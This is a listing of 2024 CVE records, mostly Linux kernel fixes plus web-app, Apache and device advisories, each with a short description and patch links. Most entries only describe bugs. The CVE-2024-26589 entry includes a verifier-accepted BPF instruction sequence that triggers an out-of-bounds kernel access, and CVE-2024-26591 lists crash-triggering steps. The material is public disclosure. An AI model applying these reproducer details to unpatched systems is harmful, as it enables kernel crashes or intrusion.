URL:https://git.kernel.org/stable/c/d0a1efe417c97a1e9b914056ee6b86f1ef75fe1f   |   MISC:https://git.kernel.org/stable/c/efeb7dfea8ee10cdec11b6b6ba4e405edbe75809   |   URL:https://git.kernel.org/stable/c/efeb7dfea8ee10cdec11b6b6ba4e405edbe75809    Assigned (20240219)
CVE    2024    26594    Candidate    In the Linux kernel, the following vulnerability has been resolved: ksmbd: validate mech token in session setup If a client sends an invalid mech token in a session setup request, ksmbd validates it and returns an error if it is invalid.    MISC:https://git.kernel.org/stable/c/5e6dfec95833edc54c48605a98365a7325e5541e   |   URL:https://git.kernel.org/stable/c/5e6dfec95833edc54c48605a98365a7325e5541e   |   MISC:https://git.kernel.org/stable/c/6eb8015492bcc84e40646390e50a862b2c0529c9   |   URL:https://git.kernel.org/stable/c/6eb8015492bcc84e40646390e50a862b2c0529c9   |   MISC:https://git.kernel.org/stable/c/92e470163d96df8db6c4fa0f484e4a229edb903d   |   URL:https://git.kernel.org/stable/c/92e470163d96df8db6c4fa0f484e4a229edb903d   |   MISC:https://git.kernel.org/stable/c/a2b21ef1ea4cf632d19b3a7cc4d4245b8e63202a   |   URL:https://git.kernel.org/stable/c/a2b21ef1ea4cf632d19b3a7cc4d4245b8e63202a   |   MISC:https://git.kernel.org/stable/c/dd1de9268745f0eac83a430db7afc32cbd62e84b   |   URL:https://git.kernel.org/stable/c/dd1de9268745f0eac83a430db7afc32cbd62e84b    Assigned (20240219)
CVE    2024    26593    Candidate    In the Linux kernel, the following vulnerability has been resolved: i2c: i801: Fix block process call transactions According to the Intel datasheets, software must reset the block buffer index twice for block process call transactions: once before writing the outgoing data to the buffer, and once again before reading the incoming data from the buffer. The driver is currently missing the second reset, causing the wrong portion of the block buffer to be read.    MISC:https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a   |   URL:https://git.kernel.org/stable/c/1f8d0691c50581ba6043f009ec9e8b9f78f09d5a   |   MISC:https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c   |   URL:https://git.kernel.org/stable/c/491528935c9c48bf341d8b40eabc6c4fc5df6f2c   |   MISC:https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2   |   URL:https://git.kernel.org/stable/c/609c7c1cc976e740d0fed4dbeec688b3ecb5dce2   |   MISC:https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9   |   URL:https://git.kernel.org/stable/c/6be99c51829b24c914cef5bff6164877178e84d9   |   MISC:https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f   |   URL:https://git.kernel.org/stable/c/7a14b8a477b88607d157c24aeb23e7389ec3319f   |   MISC:https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21   |   URL:https://git.kernel.org/stable/c/c1c9d0f6f7f1dbf29db996bd8e166242843a5f21   |   MISC:https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7   |   URL:https://git.kernel.org/stable/c/d074d5ff5ae77b18300e5079c6bda6342a4d44b7    Assigned (20240219)
CVE    2024    26592    Candidate    In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix UAF issue in ksmbd_tcp_new_connection() The race is between the handling of a new TCP connection and its disconnection. It leads to UAF on `struct tcp_transport` in ksmbd_tcp_new_connection() function.    MISC:https://git.kernel.org/stable/c/24290ba94cd0136e417283b0dbf8fcdabcf62111   |   URL:https://git.kernel.org/stable/c/24290ba94cd0136e417283b0dbf8fcdabcf62111   |   MISC:https://git.kernel.org/stable/c/380965e48e9c32ee4263c023e1d830ea7e462ed1   |   URL:https://git.kernel.org/stable/c/380965e48e9c32ee4263c023e1d830ea7e462ed1   |   MISC:https://git.kernel.org/stable/c/38d20c62903d669693a1869aa68c4dd5674e2544   |   URL:https://git.kernel.org/stable/c/38d20c62903d669693a1869aa68c4dd5674e2544   |   MISC:https://git.kernel.org/stable/c/69d54650b751532d1e1613a4fb433e591aeef126   |   URL:https://git.kernel.org/stable/c/69d54650b751532d1e1613a4fb433e591aeef126   |   MISC:https://git.kernel.org/stable/c/999daf367b924fdf14e9d83e034ee0f86bc17ec6   |   URL:https://git.kernel.org/stable/c/999daf367b924fdf14e9d83e034ee0f86bc17ec6    Assigned (20240219)
CVE    2024    26591    Candidate    In the Linux kernel, the following vulnerability has been resolved: bpf: Fix re-attachment branch in bpf_tracing_prog_attach The following case can cause a crash due to missing attach_btf: 1) load rawtp program 2) load fentry program with rawtp as target_fd 3) create tracing link for fentry program with target_fd = 0 4) repeat 3 In the end we have: - prog->aux->dst_trampoline == NULL - tgt_prog == NULL (because we did not provide target_fd to link_create) - prog->aux->attach_btf == NULL (the program was loaded with attach_prog_fd=X) - the program was loaded for tgt_prog but we have no way to find out which one BUG: kernel NULL pointer dereference, address: 0000000000000058 Call Trace: <TASK> ? __die+0x20/0x70 ? page_fault_oops+0x15b/0x430 ? fixup_exception+0x22/0x330 ? exc_page_fault+0x6f/0x170 ? asm_exc_page_fault+0x22/0x30 ? bpf_tracing_prog_attach+0x279/0x560 ? btf_obj_id+0x5/0x10 bpf_tracing_prog_attach+0x439/0x560 __sys_bpf+0x1cf4/0x2de0 __x64_sys_bpf+0x1c/0x30 do_syscall_64+0x41/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76 Return -EINVAL in this situation.    MISC:https://git.kernel.org/stable/c/50ae82f080cf87e84828f066c31723b781d68f5b   |   URL:https://git.kernel.org/stable/c/50ae82f080cf87e84828f066c31723b781d68f5b   |   MISC:https://git.kernel.org/stable/c/6cc9c0af0aa06f781fa515a1734b1a4239dfd2c0   |   URL:https://git.kernel.org/stable/c/6cc9c0af0aa06f781fa515a1734b1a4239dfd2c0   |   MISC:https://git.kernel.org/stable/c/715d82ba636cb3629a6e18a33bb9dbe53f9936ee   |   URL:https://git.kernel.org/stable/c/715d82ba636cb3629a6e18a33bb9dbe53f9936ee   |   MISC:https://git.kernel.org/stable/c/8c8bcd45e9b10eef12321f08d2e5be33d615509c   |   URL:https://git.kernel.org/stable/c/8c8bcd45e9b10eef12321f08d2e5be33d615509c   |   MISC:https://git.kernel.org/stable/c/a7b98aa10f895e2569403896f2d19b73b6c95653   |   URL:https://git.kernel.org/stable/c/a7b98aa10f895e2569403896f2d19b73b6c95653    Assigned (20240219)
CVE    2024    26590    Candidate    In the Linux kernel, the following vulnerability has been resolved: erofs: fix inconsistent per-file compression format EROFS can select compression algorithms on a per-file basis, and each per-file compression algorithm needs to be marked in the on-disk superblock for initialization. However, syzkaller can generate inconsistent crafted images that use an unsupported algorithmtype for specific inodes, e.g. use MicroLZMA algorithmtype even if it's not set in `sbi->available_compr_algs`. This can lead to an unexpected "BUG: kernel NULL pointer dereference" if the corresponding decompressor isn't built-in. Fix this by checking against `sbi->available_compr_algs` for each m_algorithmformat request. Incorrect !erofs_sb_has_compr_cfgs preset bitmap is now fixed together since it was harmless previously.    MISC:https://git.kernel.org/stable/c/118a8cf504d7dfa519562d000f423ee3ca75d2c4   |   URL:https://git.kernel.org/stable/c/118a8cf504d7dfa519562d000f423ee3ca75d2c4   |   MISC:https://git.kernel.org/stable/c/47467e04816cb297905c0f09bc2d11ef865942d9   |   URL:https://git.kernel.org/stable/c/47467e04816cb297905c0f09bc2d11ef865942d9   |   MISC:https://git.kernel.org/stable/c/823ba1d2106019ddf195287ba53057aee33cf724   |   URL:https://git.kernel.org/stable/c/823ba1d2106019ddf195287ba53057aee33cf724   |   MISC:https://git.kernel.org/stable/c/eed24b816e50c6cd18cbee0ff0d7218c8fced199   |   URL:https://git.kernel.org/stable/c/eed24b816e50c6cd18cbee0ff0d7218c8fced199    Assigned (20240219)
CVE    2024    26589    Candidate    In the Linux kernel, the following vulnerability has been resolved: bpf: Reject variable offset alu on PTR_TO_FLOW_KEYS For PTR_TO_FLOW_KEYS, check_flow_keys_access() only uses fixed off for validation. However, variable offset ptr alu is not prohibited for this ptr kind. So the variable offset is not checked. The following prog is accepted: func#0 @0 0: R1=ctx() R10=fp0 0: (bf) r6 = r1 ; R1=ctx() R6_w=ctx() 1: (79) r7 = *(u64 *)(r6 +144) ; R6_w=ctx() R7_w=flow_keys() 2: (b7) r8 = 1024 ; R8_w=1024 3: (37) r8 /= 1 ; R8_w=scalar() 4: (57) r8 &= 1024 ; R8_w=scalar(smin=smin32=0, smax=umax=smax32=umax32=1024,var_off=(0x0; 0x400)) 5: (0f) r7 += r8 mark_precise: frame0: last_idx 5 first_idx 0 subseq_idx -1 mark_precise: frame0: regs=r8 stack= before 4: (57) r8 &= 1024 mark_precise: frame0: regs=r8 stack= before 3: (37) r8 /= 1 mark_precise: frame0: regs=r8 stack= before 2: (b7) r8 = 1024 6: R7_w=flow_keys(smin=smin32=0,smax=umax=smax32=umax32=1024,var_off =(0x0; 0x400)) R8_w=scalar(smin=smin32=0,smax=umax=smax32=umax32=1024, var_off=(0x0; 0x400)) 6: (79) r0 = *(u64 *)(r7 +0) ; R0_w=scalar() 7: (95) exit This prog loads flow_keys to r7, and adds the variable offset r8 to r7, and finally causes out-of-bounds access: BUG: unable to handle page fault for address: ffffc90014c80038 [...] Call Trace: <TASK> bpf_dispatcher_nop_func include/linux/bpf.h:1231 [inline] __bpf_prog_run include/linux/filter.h:651 [inline] bpf_prog_run include/linux/filter.h:658 [inline] bpf_prog_run_pin_on_cpu include/linux/filter.h:675 [inline] bpf_flow_dissect+0x15f/0x350 net/core/flow_dissector.c:991 bpf_prog_test_run_flow_dissector+0x39d/0x620 net/bpf/test_run.c:1359 bpf_prog_test_run kernel/bpf/syscall.c:4107 [inline] __sys_bpf+0xf8f/0x4560 kernel/bpf/syscall.c:5475 __do_sys_bpf kernel/bpf/syscall.c:5561 [inline] __se_sys_bpf kernel/bpf/syscall.c:5559 [inline] __x64_sys_bpf+0x73/0xb0 kernel/bpf/syscall.c:5559 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x3f/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Fix this by rejecting ptr alu with variable offset on flow_keys. Applying the patch rejects the program with "R7 pointer arithmetic on flow_keys prohibited".    MISC:https://git.kernel.org/stable/c/1b500d5d6cecf98dd6ca88bc9e7ae1783c83e6d3   |   URL:https://git.kernel.org/stable/c/1b500d5d6cecf98dd6ca88bc9e7ae1783c83e6d3   |   MISC:https://git.kernel.org/stable/c/22c7fa171a02d310e3a3f6ed46a698ca8a0060ed   |   URL:https://git.kernel.org/stable/c/22c7fa171a02d310e3a3f6ed46a698ca8a0060ed   |   MISC:https://git.kernel.org/stable/c/29ffa63f21bcdcef3e36b03cccf9d0cd031f6ab0   |   URL:https://git.kernel.org/stable/c/29ffa63f21bcdcef3e36b03cccf9d0cd031f6ab0   |   MISC:https://git.kernel.org/stable/c/4108b86e324da42f7ed425bd71632fd844300dc8   |   URL:https://git.kernel.org/stable/c/4108b86e324da42f7ed425bd71632fd844300dc8   |   MISC:https://git.kernel.org/stable/c/e8d3872b617c21100c5ee4f64e513997a68c2e3d   |   URL:https://git.kernel.org/stable/c/e8d3872b617c21100c5ee4f64e513997a68c2e3d    Assigned (20240219)
CVE    2024    26588    Candidate    In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Prevent out-of-bounds memory access The test_tag test triggers an unhandled page fault. On my machine, which has CONFIG_PAGE_SIZE_16KB=y, the test failed at loading a BPF prog with 2039 instructions: prog = (struct bpf_prog *)ffff80001b894000 insn = (struct bpf_insn *)(prog->insnsi)fff ---truncated---    MISC:https://git.kernel.org/stable/c/36a87385e31c9343af9a4756598e704741250a67   |   URL:https://git.kernel.org/stable/c/36a87385e31c9343af9a4756598e704741250a67   |   MISC:https://git.kernel.org/stable/c/4631c2dd69d928bca396f9f58baeddf85e14ced5   |   URL:https://git.kernel.org/stable/c/4631c2dd69d928bca396f9f58baeddf85e14ced5   |   MISC:https://git.kernel.org/stable/c/7924ade13a49c0067da6ea13e398102979c0654a   |   URL:https://git.kernel.org/stable/c/7924ade13a49c0067da6ea13e398102979c0654a   |   MISC:https://git.kernel.org/stable/c/9aeb09f4d85a87bac46c010d75a2ea299d462f28   |   URL:https://git.kernel.org/stable/c/9aeb09f4d85a87bac46c010d75a2ea299d462f28    Assigned (20240219)
CVE    2024    26587    Candidate    In the Linux kernel, the following vulnerability has been resolved: net: netdevsim: don't try to destroy PHC on VFs PHC gets initialized in nsim_init_netdevsim(), which is only called if (nsim_dev_port_is_pf()). Create a counterpart of nsim_init_netdevsim() and move the mock_phc_destroy() there. This fixes a crash trying to destroy netdevsim with VFs instantiated, as caught by running the devlink.sh test: BUG: kernel NULL pointer dereference, address: 00000000000000b8 RIP: 0010:mock_phc_destroy+0xd/0x30 Call Trace: <TASK> nsim_destroy+0x4a/0x70 [netdevsim] __nsim_dev_port_del+0x47/0x70 [netdevsim] nsim_dev_reload_destroy+0x105/0x120 [netdevsim] nsim_drv_remove+0x2f/0xb0 [netdevsim] device_release_driver_internal+0x1a1/0x210 bus_remove_device+0xd5/0x120 device_del+0x159/0x490 device_unregister+0x12/0x30 del_device_store+0x11a/0x1a0 [netdevsim] kernfs_fop_write_iter+0x130/0x1d0 vfs_write+0x30b/0x4b0 ksys_write+0x69/0xf0 do_syscall_64+0xcc/0x1e0 entry_SYSCALL_64_after_hwframe+0x6f/0x77    MISC:https://git.kernel.org/stable/c/08aca65997fb6f233066883b1f1e653bcb1f26ca   |   URL:https://git.kernel.org/stable/c/08aca65997fb6f233066883b1f1e653bcb1f26ca   |   MISC:https://git.kernel.org/stable/c/c5068e442eed063d2f1658e6b6d3c1c6fcf1e588   |   URL:https://git.kernel.org/stable/c/c5068e442eed063d2f1658e6b6d3c1c6fcf1e588   |   MISC:https://git.kernel.org/stable/c/ea937f77208323d35ffe2f8d8fc81b00118bfcda   |   URL:https://git.kernel.org/stable/c/ea937f77208323d35ffe2f8d8fc81b00118bfcda    Assigned (20240219)
CVE    2024    26586    Candidate    In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix stack corruption When tc filters are first added to a net device, the corresponding local port gets bound to an ACL group in the device. The group contains a list of ACLs. In turn, each ACL points to a different TCAM region where the filters are stored. During forwarding, the ACLs are sequentially evaluated until a match is found. One reason to place filters in different regions is when they are added with decreasing priorities and in an alternating order so that two consecutive filters can never fit in the same region because of their key usage. In Spectrum-2 and newer ASICs the firmware started to report that the maximum number of ACLs in a group is more than 16, but the layout of the register that configures ACL groups (PAGT) was not updated to account for that. It is therefore possible to hit stack corruption [1] in the rare case where more than 16 ACLs in a group are required. Fix by limiting the maximum ACL group size to the minimum between what the firmware reports and the maximum ACLs that fit in the PAGT register. Add a test case to make sure the machine does not crash when this condition is hit. [1] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120 [...] dump_stack_lvl+0x36/0x50 panic+0x305/0x330 __stack_chk_fail+0x15/0x20 mlxsw_sp_acl_tcam_group_update+0x116/0x120 mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110 mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20 mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0 mlxsw_sp_acl_rule_add+0x47/0x240 mlxsw_sp_flower_replace+0x1a9/0x1d0 tc_setup_cb_add+0xdc/0x1c0 fl_hw_replace_filter+0x146/0x1f0 fl_change+0xc17/0x1360 tc_new_tfilter+0x472/0xb90 rtnetlink_rcv_msg+0x313/0x3b0 netlink_rcv_skb+0x58/0x100 netlink_unicast+0x244/0x390 netlink_sendmsg+0x1e4/0x440 ____sys_sendmsg+0x164/0x260 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xc0 do_syscall_64+0x40/0xe0 entry_SYSCALL_64_after_hwframe+0x63/0x6b    MISC:https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62   |   URL:https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62   |   MISC:https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15   |   URL:https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15   |   MISC:https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706   |   URL:https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706   |   MISC:https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182   |   URL:https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182   |   MISC:https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819   |   URL:https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819   |   MISC:https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383   |   URL:https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383    Assigned (20240219)
CVE    2024    26585    Candidate    In the Linux kernel, the following vulnerability has been resolved: tls: fix race between tx work scheduling and socket close Similarly to previous commit, the submitting thread (recvmsg/sendmsg) may exit as soon as the async crypto handler calls complete(). Reorder scheduling the work before calling complete(). This seems more logical in the first place, as it's the inverse order of what the submitting thread will do.    MISC:https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146   |   URL:https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146   |   MISC:https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb   |   URL:https://git.kernel.org/stable/c/e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb   |   MISC:https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57   |   URL:https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57    Assigned (20240219)
CVE    2024    26584    Candidate    In the Linux kernel, the following vulnerability has been resolved: net: tls: handle backlogging of crypto requests Since we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our requests to the crypto API, crypto_aead_{encrypt,decrypt} can return -EBUSY instead of -EINPROGRESS in valid situations. For example, when the cryptd queue for AESNI is full (easy to trigger with an artificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued to the backlog but still processed. In that case, the async callback will also be called twice: first with err == -EINPROGRESS, which it seems we can just ignore, then with err == 0. Compared to Sabrina's original patch this version uses the new tls_*crypt_async_wait() helpers and converts the EBUSY to EINPROGRESS to avoid having to modify all the error handling paths. The handling is identical.    MISC:https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754   |   URL:https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754   |   MISC:https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3   |   URL:https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3   |   MISC:https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694   |   URL:https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694    Assigned (20240219)
CVE    2024    26583    Candidate    In the Linux kernel, the following vulnerability has been resolved: tls: fix race between async notify and socket close The submitting thread (one which called recvmsg/sendmsg) may exit as soon as the async crypto handler calls complete() so any code past that point risks touching already freed data. Try to avoid the locking and extra flags altogether. Have the main thread hold an extra reference, this way we can depend solely on the atomic ref counter for synchronization. Don't futz with reiniting the completion, either, we are now tightly controlling when completion fires.    MISC:https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33   |   URL:https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33   |   MISC:https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01   |   URL:https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01   |   MISC:https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a   |   URL:https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a   |   MISC:https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d   |   URL:https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d    Assigned (20240219)
CVE    2024    26582    Candidate    In the Linux kernel, the following vulnerability has been resolved: net: tls: fix use-after-free with partial reads and async decrypt tls_decrypt_sg doesn't take a reference on the pages from clear_skb, so the put_page() in tls_decrypt_done releases them, and we trigger a use-after-free in process_rx_list when we try to read from the partially-read skb.    MISC:https://git.kernel.org/stable/c/20b4ed034872b4d024b26e2bc1092c3f80e5db96   |   URL:https://git.kernel.org/stable/c/20b4ed034872b4d024b26e2bc1092c3f80e5db96   |   MISC:https://git.kernel.org/stable/c/32b55c5ff9103b8508c1e04bfa5a08c64e7a925f   |   URL:https://git.kernel.org/stable/c/32b55c5ff9103b8508c1e04bfa5a08c64e7a925f   |   MISC:https://git.kernel.org/stable/c/754c9bab77a1b895b97bd99d754403c505bc79df   |   URL:https://git.kernel.org/stable/c/754c9bab77a1b895b97bd99d754403c505bc79df   |   MISC:https://git.kernel.org/stable/c/d684763534b969cca1022e2a28645c7cc91f7fa5   |   URL:https://git.kernel.org/stable/c/d684763534b969cca1022e2a28645c7cc91f7fa5    Assigned (20240219)
CVE    2024    26581    Candidate    In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_rbtree: skip end interval element from gc rbtree lazy gc on insert might collect an end interval element that has been just added in this transaction, skip end interval elements that are not yet active.    MISC:https://git.kernel.org/stable/c/10e9cb39313627f2eae4cd70c4b742074e998fd8   |   URL:https://git.kernel.org/stable/c/10e9cb39313627f2eae4cd70c4b742074e998fd8   |   MISC:https://git.kernel.org/stable/c/1296c110c5a0b45a8fcf58e7d18bc5da61a565cb   |   URL:https://git.kernel.org/stable/c/1296c110c5a0b45a8fcf58e7d18bc5da61a565cb   |   MISC:https://git.kernel.org/stable/c/2bab493a5624444ec6e648ad0d55a362bcb4c003   |   URL:https://git.kernel.org/stable/c/2bab493a5624444ec6e648ad0d55a362bcb4c003   |   MISC:https://git.kernel.org/stable/c/4cee42fcf54fec46b344681e7cc4f234bb22f85a   |   URL:https://git.kernel.org/stable/c/4cee42fcf54fec46b344681e7cc4f234bb22f85a   |   MISC:https://git.kernel.org/stable/c/60c0c230c6f046da536d3df8b39a20b9a9fd6af0   |   URL:https://git.kernel.org/stable/c/60c0c230c6f046da536d3df8b39a20b9a9fd6af0   |   MISC:https://git.kernel.org/stable/c/6eb14441f10602fa1cf691da9d685718b68b78a9   |   URL:https://git.kernel.org/stable/c/6eb14441f10602fa1cf691da9d685718b68b78a9   |   MISC:https://git.kernel.org/stable/c/b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7   |   URL:https://git.kernel.org/stable/c/b734f7a47aeb32a5ba298e4ccc16bb0c52b6dbf7    Assigned (20240219)
CVE    2024    26580    Candidate    Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.8.0 through 1.10.0, the attackers can use the specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong's 1.11.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9673    MISC:https://lists.apache.org/thread/xvomf66l58x4dmoyzojflvx52gkzcdmk   |   URL:https://lists.apache.org/thread/xvomf66l58x4dmoyzojflvx52gkzcdmk    Assigned (20240219)
CVE    2024    26578    Candidate    Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1. Repeated submission during registration resulted in the registration of the same user. When users register, if they rapidly submit multiple registrations using scripts, it can result in the creation of multiple user accounts simultaneously with the same name. Users are recommended to upgrade to version [1.2.5], which fixes the issue.    MISC:https://lists.apache.org/thread/ko0ksnznt2484lxt0zts2ygr82ldkhcb   |   URL:https://lists.apache.org/thread/ko0ksnznt2484lxt0zts2ygr82ldkhcb   |   MLIST:[oss-security] 20240222 CVE-2024-26578: Apache Answer: Repeated submission at registration created duplicate users with the same name   |   URL:http://www.openwall.com/lists/oss-security/2024/02/22/3    Assigned (20240219)
CVE    2024    26566    Candidate    An issue in Cute Http File Server v.3.1 allows a remote attacker to escalate privileges via the password verification component.    MISC:http://cute.com   |   MISC:https://github.com/GZLDL/CVE/blob/main/CVE-2024-26566/CVE-2024-26566%20English.md   |   MISC:https://github.com/GZLDL/CVE/tree/main/Cute%20Http%20File%20Server%20JWT    Assigned (20240219)
CVE    2024    26559    Candidate    An issue in uverif v.2.0 allows a remote attacker to obtain sensitive information.    MISC:https://syst1m.cn/2024/01/22/U%E9%AA%8C%E8%AF%81%E7%BD%91%E7%BB%9C%E7%94%A8%E6%88%B7%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/    Assigned (20240219)
CVE    2024    26557    Candidate    Codiad v2.8.4 allows reflected XSS via the components/market/dialog.php type parameter.    MISC:https://github.com/Hebing123/cve/issues/18    Assigned (20240219)
CVE    2024    26548    Candidate    An issue in vivotek Network Camera v.FD8166A-VVTK-0204j allows a remote attacker to execute arbitrary code via a crafted payload to the upload_file.cgi component.    MISC:https://github.com/cwh031600/vivotek/blob/main/vivotek-FD8166A-uploadfile-dos/vivotek-FD8166A-uploadfile-analysis.md    Assigned (20240219)
CVE    2024    26542    Candidate    Cross Site Scripting vulnerability in Bonitasoft, S.A v.7.14. and fixed in v.9.0.2, 8.0.3, 7.15.7, 7.14.8 allows attackers to execute arbitrary code via a crafted payload to the Groups Display name field.    MISC:https://github.com/c0d3x27/CVEs/blob/main/CVE-2024-26542/README.md    Assigned (20240219)
CVE    2024    26540    Candidate    A heap-based buffer overflow in CImg before 3.3.3 can occur via a crafted file to cimg_library::CImg<unsigned char>::_load_analyze.    MISC:https://github.com/GreycLab/CImg/issues/403    Assigned (20240219)
CVE    2024    26529    Candidate    An issue in mz-automation libiec61850 v.1.5.3 and before, allows a remote attacker to cause a denial of service (DoS) via the mmsServer_handleDeleteNamedVariableListRequest function of src/mms/iso_mms/server/mms_named_variable_list_service.c.    MISC:https://github.com/mz-automation/libiec61850/issues/492   |   MISC:https://github.com/mz-automation/libiec61850/issues/495    Assigned (20240219)
CVE    2024    26521    Candidate    HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component.    MISC:https://github.com/capture0x/Phoenix   |   MISC:https://github.com/hackervegas001/CVE-2024-26521    Assigned (20240219)
CVE    2024    26503    Candidate    Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint.    MISC:https://www.less-secure.com/2024/03/open-eclass-cve-2024-26503-unrestricted.html    Assigned (20240219)
CVE    2024    26492    Candidate    An issue in Online Diagnostic Lab Management System 1.0 allows a remote attacker to gain control of a 'Staff' user account via a crafted POST request using the id, email, password, and cpass parameters.    MISC:https://packetstormsecurity.com/files/165555/Online-Diagnostic-Lab-Management-System-1.0-Missing-Access-Control.html   |   MISC:https://www.exploit-db.com/exploits/50660    Assigned (20240219)
CVE    2024    26491    Candidate    A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Media Gallery with description' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Gallery name text field.    MISC:https://github.com/2111715623/cms/blob/main/1.md    Assigned (20240219)
CVE    2024    26490    Candidate    A cross-site scripting (XSS) vulnerability in the Addon JD Simple module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field.    MISC:https://github.com/2111715623/cms/blob/main/2.md    Assigned (20240219)
CVE    2024    2649    Candidate    A vulnerability has been found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /protocol/iscdevicestatus/deleteonlineuser.php. The manipulation of the argument messagecontent leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257287. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257287 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257287   |   MISC:VDB-257287 | Netentsec NS-ASG Application Security Gateway deleteonlineuser.php sql injection   |   URL:https://vuldb.com/?id.257287   |   MISC:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-deleteonlineuser.md   |   URL:https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-deleteonlineuser.md    Assigned (20240319)
CVE    2024    26489    Candidate    A cross-site scripting (XSS) vulnerability in the Addon JD Flusity 'Social block links' module of flusity-CMS v2.33 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Profile Name text field.    MISC:https://github.com/2111715623/cms/blob/main/3.md    Assigned (20240219)
CVE    2024    26484    Candidate    ** DISPUTED ** A stored cross-site scripting (XSS) vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link field. NOTE: the vendor's position is that this issue did not affect any version of Kirby CMS. The only effect was on the trykirby.com demo site, which is not customer-controlled.    MISC:https://github.com/getkirby/demokit/commit/d4877a6715cbf6517cb04ff57798851ffbd0cd7e   |   MISC:https://shrouded-trowel-50c.notion.site/Kirby-CMS-4-1-0-Stored-Cross-Site-Scripting-153b4eb557a2488188ad8167734ca226?pvs=4    Assigned (20240219)
